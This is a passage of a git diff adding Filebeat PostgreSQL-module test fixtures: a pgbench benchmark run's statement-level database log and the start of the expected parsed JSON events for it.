duration: 0.052 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.059 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.072 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: duration: 0.073 ms +2021-03-17 15:10:42.102 UTC [137] postgres@accounts LOG: statement: commit +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.879 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: begin +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.062 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: truncate pgbench_accounts +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: duration: 0.363 ms +2021-03-17 15:10:42.103 UTC [137] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:10:42.295 UTC [137] postgres@accounts LOG: duration: 192.094 ms +2021-03-17 15:10:42.296 UTC [137] postgres@accounts LOG: statement: commit 
+2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: duration: 1.318 ms +2021-03-17 15:10:42.297 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: duration: 17.051 ms +2021-03-17 15:10:42.314 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: duration: 2.798 ms +2021-03-17 15:10:42.317 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 88.800 ms +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: duration: 0.442 ms +2021-03-17 15:10:42.406 UTC [137] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: duration: 2.602 ms +2021-03-17 15:10:42.409 UTC [137] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: duration: 2.433 ms +2021-03-17 15:10:42.411 UTC [137] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:10:42.454 UTC [137] postgres@accounts LOG: duration: 42.396 ms +2021-03-17 15:10:44.222 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_history +2021-03-17 15:10:44.226 UTC [139] postgres@accounts LOG: duration: 4.849 ms +2021-03-17 15:10:44.228 UTC [139] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:10:44.231 UTC [139] postgres@accounts LOG: duration: 3.311 ms +2021-03-17 15:10:44.232 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_tellers +2021-03-17 15:10:44.235 UTC [139] postgres@accounts LOG: duration: 3.302 ms +2021-03-17 
15:10:44.236 UTC [139] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: duration: 2.279 ms +2021-03-17 15:10:44.238 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_accounts +2021-03-17 15:10:44.245 UTC [139] postgres@accounts LOG: duration: 7.119 ms +2021-03-17 15:10:44.248 UTC [139] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:44.250 UTC [139] postgres@accounts LOG: duration: 2.267 ms +2021-03-17 15:10:44.255 UTC [139] postgres@accounts LOG: statement: drop table if exists pgbench_branches +2021-03-17 15:10:44.260 UTC [139] postgres@accounts LOG: duration: 4.857 ms +2021-03-17 15:10:44.263 UTC [139] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 2.494 ms +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: begin +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: duration: 0.081 ms +2021-03-17 15:10:44.265 UTC [139] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.319 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.189 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.071 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values 
(3,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.075 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.087 ms +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0) +2021-03-17 15:10:44.266 UTC [139] postgres@accounts LOG: duration: 0.109 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.169 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.099 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.105 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0) +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: duration: 0.081 ms +2021-03-17 15:10:44.267 UTC [139] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0) +2021-03-17 15:10:44.268 UTC [139] postgres@accounts LOG: duration: 0.080 ms +2021-03-17 15:10:44.268 UTC [139] postgres@accounts LOG: statement: commit +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: duration: 3.046 ms +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: statement: begin +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: duration: 0.099 ms +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: statement: truncate pgbench_accounts +2021-03-17 15:10:44.271 UTC [139] postgres@accounts LOG: 
duration: 0.416 ms +2021-03-17 15:10:44.272 UTC [139] postgres@accounts LOG: statement: copy pgbench_accounts from stdin +2021-03-17 15:10:44.562 UTC [139] postgres@accounts LOG: duration: 289.924 ms +2021-03-17 15:10:44.562 UTC [139] postgres@accounts LOG: statement: commit +2021-03-17 15:10:44.563 UTC [139] postgres@accounts LOG: duration: 1.862 ms +2021-03-17 15:10:44.564 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_branches +2021-03-17 15:10:44.577 UTC [139] postgres@accounts LOG: duration: 13.040 ms +2021-03-17 15:10:44.577 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers +2021-03-17 15:10:44.580 UTC [139] postgres@accounts LOG: duration: 2.934 ms +2021-03-17 15:10:44.580 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts +2021-03-17 15:10:44.664 UTC [139] postgres@accounts LOG: duration: 84.018 ms +2021-03-17 15:10:44.664 UTC [139] postgres@accounts LOG: statement: vacuum analyze pgbench_history +2021-03-17 15:10:44.665 UTC [139] postgres@accounts LOG: duration: 0.793 ms +2021-03-17 15:10:44.665 UTC [139] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid) +2021-03-17 15:10:44.668 UTC [139] postgres@accounts LOG: duration: 3.258 ms +2021-03-17 15:10:44.668 UTC [139] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid) +2021-03-17 15:10:44.671 UTC [139] postgres@accounts LOG: duration: 2.944 ms +2021-03-17 15:10:44.671 UTC [139] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid) +2021-03-17 15:10:44.739 UTC [139] postgres@accounts LOG: duration: 68.048 ms +2021-03-17 15:10:47.438 UTC [149] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM 
pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:47.439 UTC [149] postgres@postgres LOG: duration: 0.754 ms +2021-03-17 15:10:57.720 UTC [157] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:57.721 UTC [157] postgres@postgres LOG: duration: 1.267 ms +2021-03-17 15:11:05.347 UTC [160] postgres@accounts LOG: statement: select count(*) from pgbench_branches +2021-03-17 15:11:05.350 UTC [160] postgres@accounts LOG: duration: 3.579 ms +2021-03-17 15:11:05.351 UTC [160] postgres@accounts LOG: statement: vacuum pgbench_branches +2021-03-17 15:11:05.364 UTC [160] postgres@accounts LOG: duration: 13.357 ms +2021-03-17 15:11:05.364 UTC [160] postgres@accounts LOG: statement: vacuum pgbench_tellers +2021-03-17 15:11:05.366 UTC [160] postgres@accounts LOG: duration: 1.519 ms +2021-03-17 15:11:05.366 UTC [160] postgres@accounts LOG: statement: truncate pgbench_history +2021-03-17 15:11:05.370 UTC [160] postgres@accounts LOG: duration: 3.909 ms +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: duration: 0.206 ms +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 4666 WHERE aid = 31910; +2021-03-17 15:11:05.504 UTC [161] postgres@accounts LOG: duration: 2.372 ms +2021-03-17 15:11:05.504 UTC [161] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 31910; +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.230 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 4666 WHERE tid = 4; +2021-03-17 
15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.335 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 4666 WHERE bid = 1; +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.266 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 31910, 4666, CURRENT_TIMESTAMP); +2021-03-17 15:11:05.506 UTC [161] postgres@accounts LOG: duration: 0.353 ms +2021-03-17 15:11:05.506 UTC [161] postgres@accounts LOG: statement: END; +2021-03-17 15:11:05.507 UTC [161] postgres@accounts LOG: duration: 1.203 ms +2021-03-17 15:11:06.264 UTC [162] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.265 UTC [162] postgres@accounts LOG: duration: 0.867 ms +2021-03-17 15:11:06.265 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -3403 WHERE aid = 84799; +2021-03-17 15:11:06.268 UTC [162] postgres@accounts LOG: duration: 3.093 ms +2021-03-17 15:11:06.269 UTC [162] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 84799; +2021-03-17 15:11:06.269 UTC [162] postgres@accounts LOG: duration: 0.547 ms +2021-03-17 15:11:06.270 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3403 WHERE tid = 1; +2021-03-17 15:11:06.271 UTC [162] postgres@accounts LOG: duration: 1.155 ms +2021-03-17 15:11:06.271 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3403 WHERE bid = 1; +2021-03-17 15:11:06.272 UTC [162] postgres@accounts LOG: duration: 0.830 ms +2021-03-17 15:11:06.272 UTC [162] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (1, 1, 84799, -3403, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.273 UTC [162] postgres@accounts LOG: duration: 0.967 ms +2021-03-17 15:11:06.274 UTC [162] postgres@accounts 
LOG: statement: END; +2021-03-17 15:11:06.276 UTC [162] postgres@accounts LOG: duration: 2.296 ms +2021-03-17 15:11:06.322 UTC [163] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.323 UTC [163] postgres@accounts LOG: duration: 0.427 ms +2021-03-17 15:11:06.323 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -3703 WHERE aid = 87965; +2021-03-17 15:11:06.326 UTC [163] postgres@accounts LOG: duration: 3.367 ms +2021-03-17 15:11:06.327 UTC [163] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 87965; +2021-03-17 15:11:06.327 UTC [163] postgres@accounts LOG: duration: 0.620 ms +2021-03-17 15:11:06.328 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3703 WHERE tid = 4; +2021-03-17 15:11:06.330 UTC [163] postgres@accounts LOG: duration: 2.630 ms +2021-03-17 15:11:06.331 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3703 WHERE bid = 1; +2021-03-17 15:11:06.332 UTC [163] postgres@accounts LOG: duration: 1.581 ms +2021-03-17 15:11:06.333 UTC [163] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 87965, -3703, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.334 UTC [163] postgres@accounts LOG: duration: 1.282 ms +2021-03-17 15:11:06.334 UTC [163] postgres@accounts LOG: statement: END; +2021-03-17 15:11:06.337 UTC [163] postgres@accounts LOG: duration: 2.580 ms +2021-03-17 15:11:06.586 UTC [164] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.587 UTC [164] postgres@accounts LOG: duration: 0.389 ms +2021-03-17 15:11:06.587 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 2855 WHERE aid = 24128; +2021-03-17 15:11:06.589 UTC [164] postgres@accounts LOG: duration: 2.526 ms +2021-03-17 15:11:06.590 UTC [164] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE 
aid = 24128; +2021-03-17 15:11:06.590 UTC [164] postgres@accounts LOG: duration: 0.468 ms +2021-03-17 15:11:06.591 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 2855 WHERE tid = 7; +2021-03-17 15:11:06.591 UTC [164] postgres@accounts LOG: duration: 0.940 ms +2021-03-17 15:11:06.592 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 2855 WHERE bid = 1; +2021-03-17 15:11:06.593 UTC [164] postgres@accounts LOG: duration: 0.862 ms +2021-03-17 15:11:06.593 UTC [164] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (7, 1, 24128, 2855, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.594 UTC [164] postgres@accounts LOG: duration: 0.838 ms +2021-03-17 15:11:06.594 UTC [164] postgres@accounts LOG: statement: END; +2021-03-17 15:11:06.596 UTC [164] postgres@accounts LOG: duration: 2.070 ms diff --git a/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json new file mode 100644 index 00000000000..b5254bdf0ca --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json 
@@ -0,0 +1,2708 @@ +[ + { + "@timestamp": "2021-03-17T15:10:20.767Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 0, + "message": "2021-03-17 15:10:20.767 UTC [118] postgres@postgres LOG: statement: CREATE DATABASE accounts;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "CREATE DATABASE accounts;", + "postgresql.log.timestamp": "2021-03-17 15:10:20.767 UTC", + "process.pid": 118, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:21.486Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 719435968, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 95, + "message": "2021-03-17 15:10:21.486 UTC [118] postgres@postgres LOG: duration: 719.436 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:21.486 UTC", + "process.pid": 118, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:27.112Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.flags": [ + "multiline" + ], + "log.level": "LOG", + "log.offset": 174, + "message": "2021-03-17 15:10:27.112 UTC [126] postgres@postgres LOG: statement: SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t 
pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.timestamp": "2021-03-17 15:10:27.112 UTC", + "process.pid": 126, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:27.115Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2710000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 579, + "message": "2021-03-17 15:10:27.115 UTC [126] postgres@postgres LOG: duration: 2.710 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:27.115 UTC", + "process.pid": 126, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:37.302Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.flags": [ + "multiline" + ], + "log.level": "LOG", + "log.offset": 656, + "message": "2021-03-17 15:10:37.302 UTC [135] postgres@postgres LOG: statement: SELECT d.datname as \"Name\",\n\t 
pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.timestamp": "2021-03-17 15:10:37.302 UTC", + "process.pid": 135, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:37.303Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1111000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1061, + "message": "2021-03-17 15:10:37.303 UTC [135] postgres@postgres LOG: duration: 1.111 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:37.303 UTC", + "process.pid": 135, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1138, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: drop table if 
exists pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 648000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1244, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: duration: 0.648 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1321, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.088Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + 
"event.duration": 3140000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1489, + "message": "2021-03-17 15:10:42.088 UTC [137] postgres@accounts LOG: duration: 3.140 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.088 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1566, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 229000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1672, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: duration: 0.229 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": 
"2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1749, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.092Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3339000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1924, + "message": "2021-03-17 15:10:42.092 UTC [137] postgres@accounts LOG: duration: 3.339 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.092 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2001, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_accounts", + 
